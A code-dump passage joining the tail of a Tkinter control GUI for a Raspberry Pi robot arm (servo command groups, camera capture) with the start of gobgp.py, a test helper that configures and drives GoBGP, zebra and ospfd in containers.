self.top_Level.geometry("+{}+{}".format(positionRight, positionDown))
self.top_Level.title('Modify')
self.top_Level.resizable(False, False)
self.modify_data = []
index = self.commandBox.curselection()
tk.Label(self.top_Level, text="ID").grid(row=0, column=0)
tk.Label(self.top_Level, text="Position").grid(row=0, column=1)
tk.Label(self.top_Level, text="Speed").grid(row=0, column=2)
rawData = self.commandBox.get(index)
rawData = rawData.split(' ')
for index in range(0,6):
cmd_Data = re.findall('\d+', rawData[index])
self.modify_data.append([0,0,0])
self.modify_data[index][0]= tk.Entry(self.top_Level, width=6)
self.modify_data[index][0].insert(0,index+1)
self.modify_data[index][0].grid(row=index+1,column=0)
self.modify_data[index][0].config(state='readonly')
self.modify_data[index][1]= tk.Entry(self.top_Level, width=12)
self.modify_data[index][1].insert(0,cmd_Data[1])
self.modify_data[index][1].grid(row=index+1,column=1)
self.modify_data[index][2]= tk.Entry(self.top_Level, width=12)
self.modify_data[index][2].insert(0,cmd_Data[2])
self.modify_data[index][2].grid(row=index+1,column=2)
tk.Button(self.top_Level, text='Save', command=self.modify_Save).grid(row = 7, column = 1, pady = 10, stick = 'W')
tk.Button(self.top_Level, text='Cancel', command=self.top_Level.destroy).grid(row = 7, column = 2, pady = 10, stick = 'W')
else:
tk.messagebox.showerror('Command Error','Command Not Selected..!!')
def modify_Save(self):
'''
This funciton save the modified command to command box
'''
cmdList = []
for index in range(0,6):
if (self.modify_data[index][1].get()) and (self.modify_data[index][2].get()):
cmd = "ID:" + str(index+1) +' P' + self.modify_data[index][1].get() + ",T" + self.modify_data[index][2].get() +' '
cmdList.append(cmd)
else:
tk.messagebox.showerror('Error','Fields cannot be empty')
break
if cmdList:
if str(self.delayEntry.get()) == '0':
cmdList.append('Time:' + '1000')
else:
cmdList.append('Time:' + str(self.delayEntry.get()))
value = self.commandBox.curselection()[0]
self.commandBox.delete(value)
self.commandBox.insert(value,''.join(cmdList))
self.commandBox.select_set(value)
self.commandBox.activate(value)
self.top_Level.destroy()
def cmdPlay(self):
'''
This funciton creates a thread to play the commands of the
selected group
'''
#if robot.alive:
if self.playButton.cget('text') == 'Play' and self.commandBox.size():
self.playButton.config(relief="sunken", text="Stop")
self.playFlag = True
self.threadContRead = threading.Thread(target=self._continousPlay)
self.threadContRead.daemon = True
self.threadContRead.start()
elif self.playButton.cget('text') == 'Stop':
self.playButton.config(relief="raised", text="Play")
self.playFlag = False
else:
messagebox.showerror("Data Error", "No command to play..!!")
def _continousPlay(self):
'''
This thread play the coomands of the selected group
'''
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
size = self.commandBox.size()
while self.playFlag:
for index in range(0, size):
self.commandBox.select_set(index)
rawData = self.commandBox.get(index)
rawData = rawData.split(' ')
delay = rawData[-1].split(':')
delay = int(delay[1])/1000
if robot.alive:
for value in range(0, 6):
cmd_Data = re.findall('\d+', rawData[value])
robot.servoWrite(int(cmd_Data[0]), int(cmd_Data[1]), int(cmd_Data[2]))
self.checkIDVar[value].set(1)
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
time.sleep(delay)
self.commandBox.select_clear(index)
if not self.playFlag:
break
if not self.loopVar.get():
self.playButton.config(relief="raised", text="Play")
self.playFlag = False
def importGroup(self):
'''
This funciton import the group and its commands
'''
file_path = filedialog.askopenfilename(initialdir = Root_Dir)
line_index = 0
if file_path:
file_name = file_path.split('/')
group_Name = file_name[-1].split('.')
for name in self.groupBox.get(0, 'end'):
if group_Name[0] == name:
tk.messagebox.showerror('Group Error','Group Name already exists..!!')
return False
file = open(file_path, 'r')
shutil.copy2(file_path, Root_Dir + '/.Temp/' + group_Name[0] + '.txt' )
self.groupBox.insert('end', group_Name[0])
if self.groupBox.size() == 1:
self.groupBox.select_set(0)
self.groupBox.activate(0)
self.groupSelected = group_Name[0]
for line in file:
stripLine = line.strip()
self.commandBox.insert(line_index,stripLine)
line_index = line_index + 1
def exportGroup(self):
'''
This funciton exports the group in .txt format
'''
if self.groupBox.size():
with open(Root_Dir + '/Export Files/'+ self.groupSelected +'.txt', 'w') as file:
size = self.commandBox.size()
if size:
for index in range(0, size):
cmdValue = self.commandBox.get(index)
file.write(''.join(cmdValue)+'\n')
tk.messagebox.showinfo('Export',self.groupSelected+'.txt'+'- Exported')
else:
tk.messagebox.showerror('Export Error','Cannot export file empty file..!!')
else:
tk.messagebox.showerror('Export Error','Group Name Not Selected..!!')
def rightFrame_Contents(self):
'''
This function creates right frame contents
'''
LINE = [
(130, 70, 180, 70, 'SteelBlue2', 30), (110, 20, 110, 100, 'gray30', 50),
(180, 70, 260, 70, 'gray30', 50), (260, 70, 310, 70, 'SteelBlue2', 30),
(310, 70, 390, 70, 'gray30', 50), (350, 150, 350, 95, 'SteelBlue2', 30),
(280, 255, 370, 155, 'SteelBlue2', 30), (310, 170, 390, 170, 'gray30', 50),
(250, 260, 330, 260, 'gray30', 50), (220, 285, 420, 285, 'SteelBlue2', 5),
(240, 293, 400, 293, 'gray65', 10), (240, 300, 240, 350, 'gold', 8),
(400, 300, 400, 350, 'gold', 8), (220, 300, 420, 300, 'SteelBlue2', 5),
(280, 325, 360, 325, 'gray30', 47)]
ID_LABEL = [(95, 20), (190, 50), (320, 50), (320, 150), (260, 240), (290, 305)]
C_BUTTON = [(95, 35), (230, 50), (360, 50),(360, 150), (300, 240), (330, 305)]
POS_VAL = [(500, 90, 55), (500, 184, 72), (500, 314, 72), (500, 314, 172),
(500, 254, 262), (500, 284, 327)]
TIME_VAL = [(95, 78), (227, 72), (357, 72), (357, 172), (297, 262), (327, 327)]
self.bodyCanvas=tk.Canvas(self.right_frame,width=480,height=350,bg="white")
self.bodyCanvas.grid(row=0, column=0)
self.bodyCanvas.grid_propagate(0)
self.bodyCanvas.create_polygon(90,20,30,20, 30,30, 90, 60, 90,100,30,100, 30,90, 90, 60, fill='gray30')
pos_vcmd = (self.register(self.pos_validate),'%s','%S','%P', '%V')
time_vcmd = (self.register(self.time_validate),'%P')
for index in range(15):
self.bodyCanvas.create_line(LINE[index][0], LINE[index][1], LINE[index][2],
LINE[index][3], fill=LINE[index][4],
width=LINE[index][5])
for index in range(6):
var = tk.IntVar()
label = tk.Label(self.bodyCanvas, text='ID-'+ str(index+1), bg='gray30',
fg='white')
label.place(x=ID_LABEL[index][0], y=ID_LABEL[index][1])
checkBut = tk.Checkbutton(self.bodyCanvas,bg='gray30',variable=var,
command= lambda index=index: self.tick_EnTorque(index))
checkBut.place(x=C_BUTTON[index][0],y=C_BUTTON[index][1])
self.checkIDVar.append(var)
entry = tk.Entry(self.bodyCanvas,validate='key', bg='SlateGray1',
validatecommand = pos_vcmd, width=4, bd='1')
entry.place(x=POS_VAL[index][1], y=POS_VAL[index][2])
entry.insert('end', POS_VAL[index][0])
self.posEntry.append(entry)
entry = tk.Entry(self.bodyCanvas, validate='key',
validatecommand = time_vcmd, width=3, bd='1')
entry.place(x=TIME_VAL[index][0], y=TIME_VAL[index][1])
entry.insert('end', 500)
self.timeEntry.append(entry)
logoButton = tk.Button(self.bodyCanvas, image=logo, height = 40, width = 130,
bg='white', bd=0, highlightthickness=0, fg='white',
state='disabled')
logoButton.place(x=10, y=300)
self.camButton = tk.Button(self.bodyCanvas,text='Camera',command = self.camera,bg='gray80',highlightthickness=0)
self.camButton.place(x=320, y=5)
self.closeButton = tk.Button(self.bodyCanvas,text='Close',command=self.close_Robot,
bg='gray80',highlightthickness=0)
self.closeButton.place(x=410, y=5)
# Group Name
tk.Label(self.right_frame,text="GROUP NAME",fg='white',bg="gray50",padx=36).place(x=481,y=0)
self.groupBox = tk.Listbox(self.right_frame, exportselection=0,height=22, width = 19)
self.groupBox.place(x=480,y=18)
self.groupBox.select_set(0)
self.groupBox.activate(0)
ygscrollbar = tk.Scrollbar(self.right_frame)
ygscrollbar.place(x=620, y=21, relheight = 0.69)
self.groupBox.config(yscrollcommand=ygscrollbar.set)
ygscrollbar.config(command=self.groupBox.yview)
self.groupBox.bind("<<ListboxSelect>>",self.groupBindData )
# Command
frame = tk.Frame(self.right_frame,height=15, width=632, bg="gray50")
frame.place(x=0,y=350)
tk.Label(self.right_frame,text="COMMAND",fg="white",bg="gray50",pady=0).place(x=270,y=350)
self.commandBox = tk.Listbox(self.right_frame,exportselection=0,height=7,width=77)
self.commandBox.place(x=0,y=364)
xscrollbar = tk.Scrollbar(self.right_frame, orient = 'horizontal')
xscrollbar.place(x=0, y=468, relwidth = 1)
yscrollbar = tk.Scrollbar(self.right_frame)
yscrollbar.place(x=620, y=367, relheight = 0.21)
self.commandBox.config(xscrollcommand=xscrollbar.set)
self.commandBox.config(yscrollcommand=yscrollbar.set)
xscrollbar.config(command=self.commandBox.xview)
yscrollbar.config(command=self.commandBox.yview)
self.commandBox.bind("<Double-Button-1>", self.onclickPlay)
def delay_validate(self, new_value):
'''
This funciton validate delay entry value
'''
try:
if str(new_value) == '':
return True
elif int(new_value) >= 0 and int(new_value) <= 3000:
return True
else:
self.bell()
return False
except ValueError:
self.bell()
return False
def pos_validate(self, textBefore, textInserted, entryValue, focus):
'''
This funciton validate position entry values
'''
try:
if entryValue:
if int(entryValue) >= 0 and int(entryValue) <= 999:
return True
else:
self.bell()
return False
else:
return True
except ValueError:
self.bell()
return False
def time_validate(self, new_value):
'''
This funciton validates time entry values
'''
try:
if new_value:
if int(new_value) >= 0 and int(new_value) <= 999:
return True
else:
self.bell()
return False
else:
return True
except ValueError:
self.bell()
return False
def groupBindData(self,event):
'''
This funciton bind data of the group box
'''
curSelection = self.groupBox.curselection()
if curSelection:
selectedGroup = self.groupBox.get(curSelection)
if self.groupSelected != selectedGroup:
self.commandBox.delete(0, 'end')
self.groupSelected = selectedGroup
file = open(Root_Dir+'/.Temp/'+ self.groupSelected +'.txt', 'r')
for line in file:
stripLine = line.strip()
self.commandBox.insert(0,stripLine)
def onclickPlay(self, event):
'''
This funciton handle double click play of command
'''
index = self.commandBox.curselection()
if index:
rawData = self.commandBox.get(index)
rawData = rawData.split(' ')
delay = rawData[-1].split(':')
delay = int(delay[1])/1000
if robot.alive:
for value in range(0, 17):
cmd_Data = re.findall('\d+', rawData[value])
robot.servoWrite(int(cmd_Data[0]), int(cmd_Data[1]), int(cmd_Data[2]))
self.checkIDVar[value].set(1)
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def camera(self):
'''
This funciton creates camera frame and forget GUI
'''
self.container.pack_forget()
self.camFrame.pack(fill = 'both', expand = True)
self.Fl_VideoRecord = False
camButton = tk.Button(self.camFrame,text="Photo",font=("Helvetica",16),compound="top",
bd = 0,bg = "black", fg = "white",highlightbackground = "black",
activebackground = "black",activeforeground = "white",
image=self.camIcon,command = lambda: self.startPreview("Picture"),
highlightthickness=0)
camButton.place(x=140, y=100)
vidButton = tk.Button(self.camFrame,text="Video",font=("Helvetica",16),compound="top",
bd = 0,bg = "black", fg = "white",highlightbackground = "black",
activebackground = "black",activeforeground = "white",
image=self.vidIcon,command = lambda: self.startPreview("Video"),
highlightthickness=0)
vidButton.place(x=450, y=100)
self.camhome = tk.Button(self.camFrame,image=self.homeIcon, bg = "black", fg = "black", bd = 0,
highlightbackground = "black",text='Home',
activebackground = "black",command=self.forgetCam,
activeforeground = "black")
self.camhome.place(x=730,y=40)
self.back = tk.Button(self.camFrame,text = "Home", bg = "black", fg = "black",
bd = 0, image = self.backIcon,
highlightbackground = "black",
activebackground = "black",
activeforeground = "black",state="disable",
command = self.camBack)
self.back.place(x=730,y=280)
self.click = tk.Button(self.camFrame, image=self.clickIcon,bg = "black", fg = "black",
bd = 0,font=("bold",12), command=self.camClick,
highlightbackground="black",
activebackground = "black",
activeforeground="black",compound="center",
state="disable")
self.click.place(x=725,y=160)
def startPreview(self, arg):
'''
Start Preview of Camera
'''
self.cameraMode = arg
label = tk.Label(self.camFrame, text="",font=("helvetica", 15), bg='black')
label.place(x=250, y=350)
response = subprocess.check_output(["sudo","vcgencmd","get_camera"])
if(response == b'supported=1 detected=1\n'):
self.camera = picamera.PiCamera()
self.back.config(state="normal")
self.click.config(state="normal")
if arg == "Picture":
self.click.config(text="Photo")
else:
self.click.config(text="Video")
self.camera.preview_fullscreen=False
self.camera.preview_window=(400, 240, 730, 480)
self.camera.resolution=(800,480)
self.camera.start_preview()
self.camhome.config(state="disable")
elif(response == b'supported=0 detected=0\n'):
label.config(text="Error: Camera is not enabled", bg="yellow")
label.after(4000, label.place_forget)
else:
label.config(text="Error: Camera is not connected properly",
bg="yellow")
label.after(4000, label.place_forget)
def camClick(self):
'''
Click Photos and Videos
'''
if(self.cameraMode == "Picture"):
self.camera.capture(Root_Dir + '/Gallery/Photos/' + 'img_' +
time.strftime('%d%m%Y_')+time.strftime('%H%M%S')
+ '.jpg')
elif (self.cameraMode == "Video") and self.Fl_VideoRecord == False:
self.click.config(text="Record", fg="red")
self.back.config(state="disable")
self.Fl_VideoRecord = True
self.camera.start_recording(Root_Dir + '/Gallery/Videos/' + 'vid_' +
time.strftime('%d%m%Y_')+
time.strftime('%H%M%S') + '.h264')
elif self.Fl_VideoRecord == True:
self.Fl_VideoRecord = False
self.cameraMode = None
self.camera.stop_recording()
self.camera.stop_preview()
self.camera.close()
self.click.config(text="",fg="black")
self.back.config(state="disable")
self.click.config(state="disable")
self.camhome.config(state="normal")
def camBack(self):
'''
This funciton goes back to camera home frame
'''
self.camera.stop_preview()
self.camera.close()
self.click.config(text="",fg="black")
self.back.config(state="disable")
self.click.config(state="disable")
self.camhome.config(state="normal")
def forgetCam(self):
'''
This funciton close the camera frame and open the GUI
'''
self.camFrame.pack_forget()
self.container.pack(fill = 'both', expand = True)
#######################################################################################################
robot = None
logo = None
img = None
MAX_VALUE = 1023
Root_Dir = os.path.dirname(os.path.realpath(__file__))
if os.path.exists(Root_Dir + '/.Temp'):
shutil.rmtree(Root_Dir + '/.Temp')
os.mkdir(Root_Dir + '/.Temp')
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
if __name__ == "__main__":
robot = piarm.PiArm()
app = MainApp()
app.tk.call('wm', 'iconphoto', app._w, img)
app.resizable(0,0)
app.mainloop()
|
gobgp.py
|
# Copyright (C) 2015 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
from itertools import chain
from threading import Thread
import subprocess
import os
from fabric import colors
from fabric.api import local
from fabric.utils import indent
import netaddr
import toml
import yaml
from lib.base import (
BGPContainer,
CmdBuffer,
BGP_ATTR_TYPE_AS_PATH,
BGP_ATTR_TYPE_NEXT_HOP,
BGP_ATTR_TYPE_MULTI_EXIT_DISC,
BGP_ATTR_TYPE_LOCAL_PREF,
BGP_ATTR_TYPE_COMMUNITIES,
BGP_ATTR_TYPE_MP_REACH_NLRI,
community_str,
)
def extract_path_attribute(path, typ):
for a in path['attrs']:
if a['type'] == typ:
return a
return None
class GoBGPContainer(BGPContainer):
SHARED_VOLUME = '/root/shared_volume'
QUAGGA_VOLUME = '/etc/quagga'
def __init__(self, name, asn, router_id, ctn_image_name='osrg/gobgp',
log_level='debug', zebra=False, config_format='toml',
zapi_version=2, ospfd_config=None):
super(GoBGPContainer, self).__init__(name, asn, router_id,
ctn_image_name)
self.shared_volumes.append((self.config_dir, self.SHARED_VOLUME))
self.quagga_config_dir = '{0}/quagga'.format(self.config_dir)
self.shared_volumes.append((self.quagga_config_dir, self.QUAGGA_VOLUME))
self.log_level = log_level
self.prefix_set = None
self.neighbor_set = None
self.bgp_set = None
self.statements = None
self.default_policy = None
self.zebra = zebra
self.zapi_version = zapi_version
self.config_format = config_format
# To start OSPFd in GoBGP container, specify 'ospfd_config' as a dict
# type value.
# Example:
# ospfd_config = {
# 'redistributes': [
# 'connected',
# ],
# 'networks': {
# '192.168.1.0/24': '0.0.0.0', # <network>: <area>
# },
# }
self.ospfd_config = ospfd_config or {}
def _start_gobgp(self, graceful_restart=False):
c = CmdBuffer()
c << '#!/bin/bash'
c << '/go/bin/gobgpd -f {0}/gobgpd.conf -l {1} -p {2} -t {3} > ' \
'{0}/gobgpd.log 2>&1'.format(self.SHARED_VOLUME, self.log_level, '-r' if graceful_restart else '', self.config_format)
cmd = 'echo "{0:s}" > {1}/start.sh'.format(c, self.config_dir)
local(cmd, capture=True)
cmd = "chmod 755 {0}/start.sh".format(self.config_dir)
local(cmd, capture=True)
self.local("{0}/start.sh".format(self.SHARED_VOLUME), detach=True)
def graceful_restart(self):
self.local("pkill -INT gobgpd")
def _start_zebra(self):
if self.zapi_version == 2:
daemon_bin = '/usr/lib/quagga/zebra'
else:
daemon_bin = 'zebra'
cmd = '{0} -f {1}/zebra.conf'.format(daemon_bin, self.QUAGGA_VOLUME)
self.local(cmd, detach=True)
def _start_ospfd(self):
if self.zapi_version == 2:
daemon_bin = '/usr/lib/quagga/ospfd'
else:
daemon_bin = 'ospfd'
cmd = '{0} -f {1}/ospfd.conf'.format(daemon_bin, self.QUAGGA_VOLUME)
self.local(cmd, detach=True)
def run(self):
super(GoBGPContainer, self).run()
if self.zebra:
self._start_zebra()
if self.ospfd_config:
self._start_ospfd()
self._start_gobgp()
return self.WAIT_FOR_BOOT
@staticmethod
def _get_as_path(path):
asps = (p['as_paths'] for p in path['attrs']
if p['type'] == BGP_ATTR_TYPE_AS_PATH and 'as_paths' in p and p['as_paths'] is not None)
asps = chain.from_iterable(asps)
asns = (asp['asns'] for asp in asps)
return list(chain.from_iterable(asns))
@staticmethod
def _get_nexthop(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_NEXT_HOP or p['type'] == BGP_ATTR_TYPE_MP_REACH_NLRI:
return p['nexthop']
@staticmethod
def _get_local_pref(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_LOCAL_PREF:
return p['value']
return None
@staticmethod
def _get_med(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_MULTI_EXIT_DISC:
return p['metric']
return None
@staticmethod
def _get_community(path):
for p in path['attrs']:
if p['type'] == BGP_ATTR_TYPE_COMMUNITIES:
return [community_str(c) for c in p['communities']]
return None
def _get_rib(self, dests_dict):
dests = []
for k, v in dests_dict.items():
for p in v:
p["nexthop"] = self._get_nexthop(p)
p["aspath"] = self._get_as_path(p)
p["local-pref"] = self._get_local_pref(p)
p["community"] = self._get_community(p)
p["med"] = self._get_med(p)
p["prefix"] = k
path_id = p.get("id", None)
if path_id:
p["identifier"] = p["id"]
dests.append({'paths': v, 'prefix': k})
return dests
def _trigger_peer_cmd(self, cmd, peer):
peer_addr = self.peer_name(peer)
cmd = 'gobgp neighbor {0} {1}'.format(peer_addr, cmd)
self.local(cmd)
def disable_peer(self, peer):
self._trigger_peer_cmd('disable', peer)
def enable_peer(self, peer):
self._trigger_peer_cmd('enable', peer)
def reset(self, peer):
self._trigger_peer_cmd('reset', peer)
def softreset(self, peer, rf='ipv4', type='in'):
self._trigger_peer_cmd('softreset{0} -a {1}'.format(type, rf), peer)
def get_local_rib(self, peer, prefix='', rf='ipv4'):
peer_addr = self.peer_name(peer)
cmd = 'gobgp -j neighbor {0} local {1} -a {2}'.format(peer_addr, prefix, rf)
output = self.local(cmd, capture=True)
return self._get_rib(json.loads(output))
def get_global_rib(self, prefix='', rf='ipv4'):
cmd = 'gobgp -j global rib {0} -a {1}'.format(prefix, rf)
output = self.local(cmd, capture=True)
return self._get_rib(json.loads(output))
def monitor_global_rib(self, queue, rf='ipv4'):
host = self.ip_addrs[0][1].split('/')[0]
if not os.path.exists('{0}/gobgp'.format(self.config_dir)):
self.local('cp /go/bin/gobgp {0}/'.format(self.SHARED_VOLUME))
args = '{0}/gobgp -u {1} -j monitor global rib -a {2}'.format(self.config_dir, host, rf).split(' ')
def monitor():
process = subprocess.Popen(args, stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
p = json.loads(line)[0]
p["nexthop"] = self._get_nexthop(p)
p["aspath"] = self._get_as_path(p)
p["local-pref"] = self._get_local_pref(p)
p["med"] = self._get_med(p)
queue.put(p)
t = Thread(target=monitor)
t.daemon = True
t.start()
def _get_adj_rib(self, adj_type, peer, prefix='', rf='ipv4'):
peer_addr = self.peer_name(peer)
cmd = 'gobgp neighbor {0} adj-{1} {2} -a {3} -j'.format(peer_addr,
adj_type,
prefix, rf)
output = self.local(cmd, capture=True)
ret = [p[0] for p in json.loads(output).itervalues()]
for p in ret:
p["nexthop"] = self._get_nexthop(p)
p["aspath"] = self._get_as_path(p)
p["prefix"] = p['nlri']['prefix']
p["local-pref"] = self._get_local_pref(p)
p["med"] = self._get_med(p)
return ret
def get_adj_rib_in(self, peer, prefix='', rf='ipv4'):
return self._get_adj_rib('in', peer, prefix, rf)
def get_adj_rib_out(self, peer, prefix='', rf='ipv4'):
return self._get_adj_rib('out', peer, prefix, rf)
def get_neighbor(self, peer):
cmd = 'gobgp -j neighbor {0}'.format(self.peer_name(peer))
return json.loads(self.local(cmd, capture=True))
def get_neighbor_state(self, peer):
return self.get_neighbor(peer)['state']['session-state']
def clear_policy(self):
self.policies = {}
for info in self.peers.itervalues():
info['policies'] = {}
self.prefix_set = []
self.neighbor_set = []
self.statements = []
def set_prefix_set(self, ps):
if not isinstance(ps, list):
ps = [ps]
self.prefix_set = ps
def add_prefix_set(self, ps):
if self.prefix_set is None:
self.prefix_set = []
self.prefix_set.append(ps)
def set_neighbor_set(self, ns):
if not isinstance(ns, list):
ns = [ns]
self.neighbor_set = ns
def add_neighbor_set(self, ns):
if self.neighbor_set is None:
self.neighbor_set = []
self.neighbor_set.append(ns)
def set_bgp_defined_set(self, bs):
self.bgp_set = bs
def create_config(self):
self._create_config_bgp()
if self.zebra:
local('mkdir -p {0}'.format(self.quagga_config_dir))
local('chmod 777 {0}'.format(self.quagga_config_dir))
self._create_config_zebra()
if self.ospfd_config:
self._create_config_ospfd()
def _create_config_bgp(self):
config = {
'global': {
'config': {
'as': self.asn,
'router-id': self.router_id,
},
'route-selection-options': {
'config': {
'external-compare-router-id': True,
},
},
},
'neighbors': [],
}
if self.zebra and self.zapi_version == 2:
config['global']['use-multiple-paths'] = {'config': {'enabled': True}}
for peer, info in self.peers.iteritems():
afi_safi_list = []
if info['interface'] != '':
afi_safi_list.append({'config':{'afi-safi-name': 'ipv4-unicast'}})
afi_safi_list.append({'config':{'afi-safi-name': 'ipv6-unicast'}})
else:
version = netaddr.IPNetwork(info['neigh_addr']).version
if version == 4:
afi_safi_list.append({'config':{'afi-safi-name': 'ipv4-unicast'}})
elif version == 6:
afi_safi_list.append({'config':{'afi-safi-name': 'ipv6-unicast'}})
else:
Exception('invalid ip address version. {0}'.format(version))
if info['vpn']:
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv4-unicast'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv6-unicast'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l2vpn-evpn'}})
afi_safi_list.append({'config': {'afi-safi-name': 'rtc'}, 'route-target-membership': {'config': {'deferral-time': 10}}})
if info['flowspec']:
afi_safi_list.append({'config': {'afi-safi-name': 'ipv4-flowspec'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv4-flowspec'}})
afi_safi_list.append({'config': {'afi-safi-name': 'ipv6-flowspec'}})
afi_safi_list.append({'config': {'afi-safi-name': 'l3vpn-ipv6-flowspec'}})
neigh_addr = None
interface = None
if info['interface'] == '':
neigh_addr = info['neigh_addr'].split('/')[0]
else:
interface = info['interface']
n = {
'config': {
'neighbor-address': neigh_addr,
'neighbor-interface': interface,
'peer-as': peer.asn,
'auth-password': info['passwd'],
'vrf': info['vrf'],
'remove-private-as': info['remove_private_as'],
},
'afi-safis': afi_safi_list,
'timers': {
'config': {
'connect-retry': 10,
},
},
'transport': {
'config': {},
},
}
n['as-path-options'] = {'config': {}}
if info['allow_as_in'] > 0:
n['as-path-options']['config']['allow-own-as'] = info['allow_as_in']
if info['replace_peer_as']:
n['as-path-options']['config']['replace-peer-as'] = info['replace_peer_as']
if ':' in info['local_addr']:
n['transport']['config']['local-address'] = info['local_addr'].split('/')[0]
if info['passive']:
n['transport']['config']['passive-mode'] = True
if info['is_rs_client']:
n['route-server'] = {'config': {'route-server-client': True}}
if info['local_as']:
n['config']['local-as'] = info['local_as']
if info['prefix_limit']:
for v in afi_safi_list:
v['prefix-limit'] = {'config': {'max-prefixes': info['prefix_limit'], 'shutdown-threshold-pct': 80}}
if info['graceful_restart'] is not None:
n['graceful-restart'] = {'config': {'enabled': True, 'restart-time': 20}}
for afi_safi in afi_safi_list:
afi_safi['mp-graceful-restart'] = {'config': {'enabled': True}}
if info['llgr'] is not None:
n['graceful-restart']['config']['restart-time'] = 1
n['graceful-restart']['config']['long-lived-enabled'] = True
for afi_safi in afi_safi_list:
afi_safi['long-lived-graceful-restart'] = {'config': {'enabled': True, 'restart-time': 30}}
if info['is_rr_client']:
cluster_id = self.router_id
if 'cluster_id' in info and info['cluster_id'] is not None:
cluster_id = info['cluster_id']
n['route-reflector'] = {'config': {'route-reflector-client': True,
'route-reflector-cluster-id': cluster_id}}
if info['addpath']:
n['add-paths'] = {'config' : {'receive': True,
'send-max': 16}}
if len(info.get('default-policy', [])) + len(info.get('policies', [])) > 0:
n['apply-policy'] = {'config': {}}
for typ, p in info.get('policies', {}).iteritems():
n['apply-policy']['config']['{0}-policy-list'.format(typ)] = [p['name']]
def _f(v):
if v == 'reject':
return 'reject-route'
elif v == 'accept':
return 'accept-route'
raise Exception('invalid default policy type {0}'.format(v))
for typ, d in info.get('default-policy', {}).iteritems():
n['apply-policy']['config']['default-{0}-policy'.format(typ)] = _f(d)
if info['treat_as_withdraw']:
n['error-handling'] = {'config': {'treat-as-withdraw': True}}
config['neighbors'].append(n)
config['defined-sets'] = {}
if self.prefix_set:
config['defined-sets']['prefix-sets'] = self.prefix_set
if self.neighbor_set:
config['defined-sets']['neighbor-sets'] = self.neighbor_set
if self.bgp_set:
config['defined-sets']['bgp-defined-sets'] = self.bgp_set
policy_list = []
for p in self.policies.itervalues():
policy = {'name': p['name']}
if 'statements' in p:
policy['statements'] = p['statements']
policy_list.append(policy)
if len(policy_list) > 0:
config['policy-definitions'] = policy_list
if self.zebra:
config['zebra'] = {'config': {'enabled': True,
'redistribute-route-type-list': ['connect'],
'version': self.zapi_version}}
with open('{0}/gobgpd.conf'.format(self.config_dir), 'w') as f:
print colors.yellow('[{0}\'s new gobgpd.conf]'.format(self.name))
if self.config_format is 'toml':
raw = toml.dumps(config)
elif self.config_format is 'yaml':
raw = yaml.dump(config)
elif self.config_format is 'json':
raw = json.dumps(config)
else:
raise Exception('invalid config_format {0}'.format(self.config_format))
print colors.yellow(indent(raw))
f.write(raw)
def _create_config_zebra(self):
c = CmdBuffer()
c << 'hostname zebra'
c << 'password zebra'
c << 'log file {0}/zebra.log'.format(self.QUAGGA_VOLUME)
c << 'debug zebra packet'
c << 'debug zebra kernel'
c << 'debug zebra rib'
c << ''
with open('{0}/zebra.conf'.format(self.quagga_config_dir), 'w') as f:
print colors.yellow('[{0}\'s new zebra.conf]'.format(self.name))
print colors.yellow(indent(str(c)))
f.writelines(str(c))
def _create_config_ospfd(self):
c = CmdBuffer()
c << 'hostname ospfd'
c << 'password zebra'
c << 'router ospf'
for redistribute in self.ospfd_config.get('redistributes', []):
c << ' redistribute {0}'.format(redistribute)
for network, area in self.ospfd_config.get('networks', {}).items():
c << ' network {0} area {1}'.format(network, area)
c << 'log file {0}/ospfd.log'.format(self.QUAGGA_VOLUME)
c << ''
with open('{0}/ospfd.conf'.format(self.quagga_config_dir), 'w') as f:
print colors.yellow('[{0}\'s new ospfd.conf]'.format(self.name))
print colors.yellow(indent(str(c)))
f.writelines(str(c))
def reload_config(self):
daemon = ['gobgpd']
if self.zebra:
daemon.append('zebra')
if self.ospfd_config:
daemon.append('ospfd')
for d in daemon:
cmd = '/usr/bin/pkill {0} -SIGHUP'.format(d)
self.local(cmd)
for v in chain.from_iterable(self.routes.itervalues()):
if v['rf'] == 'ipv4' or v['rf'] == 'ipv6':
r = CmdBuffer(' ')
r << 'gobgp global -a {0}'.format(v['rf'])
r << 'rib add {0}'.format(v['prefix'])
if v['identifier']:
r << 'identifier {0}'.format(v['identifier'])
if v['next-hop']:
r << 'nexthop {0}'.format(v['next-hop'])
if v['local-pref']:
r << 'local-pref {0}'.format(v['local-pref'])
if v['med']:
r << 'med {0}'.format(v['med'])
if v['community']:
r << 'community {0}'.format(
','.join(v['community'])
if isinstance(v['community'], (list, tuple)) else v['community'])
cmd = str(r)
elif v['rf'] == 'ipv4-flowspec' or v['rf'] == 'ipv6-flowspec':
cmd = 'gobgp global '\
'rib add match {0} then {1} -a {2}'.format(' '.join(v['matchs']), ' '.join(v['thens']), v['rf'])
else:
raise Exception('unsupported route faily: {0}'.format(v['rf']))
self.local(cmd)
def del_route(self, route, identifier=None, reload_config=True):
if route not in self.routes:
return
new_paths = []
for path in self.routes[route]:
if path['identifier'] != identifier:
new_paths.append(path)
else:
r = CmdBuffer(' ')
r << 'gobgp global -a {0}'.format(path['rf'])
r << 'rib del {0}'.format(path['prefix'])
if identifier:
r << 'identifier {0}'.format(identifier)
cmd = str(r)
self.local(cmd)
self.routes[route] = new_paths
# no need to reload config
class RawGoBGPContainer(GoBGPContainer):
def __init__(self, name, config, ctn_image_name='osrg/gobgp',
log_level='debug', zebra=False, config_format='yaml'):
if config_format is 'toml':
